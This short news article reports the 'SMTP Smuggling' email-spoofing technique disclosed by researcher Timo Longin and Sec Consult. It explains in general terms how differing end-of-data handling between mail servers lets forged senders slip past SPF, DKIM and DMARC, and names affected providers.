Cybersecurity researcher Timo Longin, in collaboration with Sec Consult, has discovered a new attack method called “SMTP Smuggling”. This method allows attackers to send fake letters on behalf of other users, bypassing the authenticity of the mail.
SMTP, which stands for Simple Mail Transfer Protocol, is the standard protocol used to transmit email on the internet. It defines the rules for the exchange of messages between mail servers and clients.
According to experts, the identified problem lies in the differences in how incoming and outgoing SMTP servers interpret the sequence of characters that indicate the end of the email data. These differences enable attackers to introduce additional information into the email, easily bypassing the SPF, DKIM, and DMARC mechanisms.
SPF, DKIM, and DMARC are mechanisms designed to check the authenticity of emails and combat spam and phishing. They analyze the headers of emails to determine if they were truly sent by the claimed sender. However, the SMTP Smuggling attack allows these mechanisms to be bypassed.
This problem affects millions of domains, including Microsoft, Amazon, PayPal, eBay, GitHub, Outlook, and Office365. In their report, the researchers demonstrated the ability to send emails from other people’s addresses.
For more information on the SMTP Smuggling attack, you can refer to the researchers’ report here.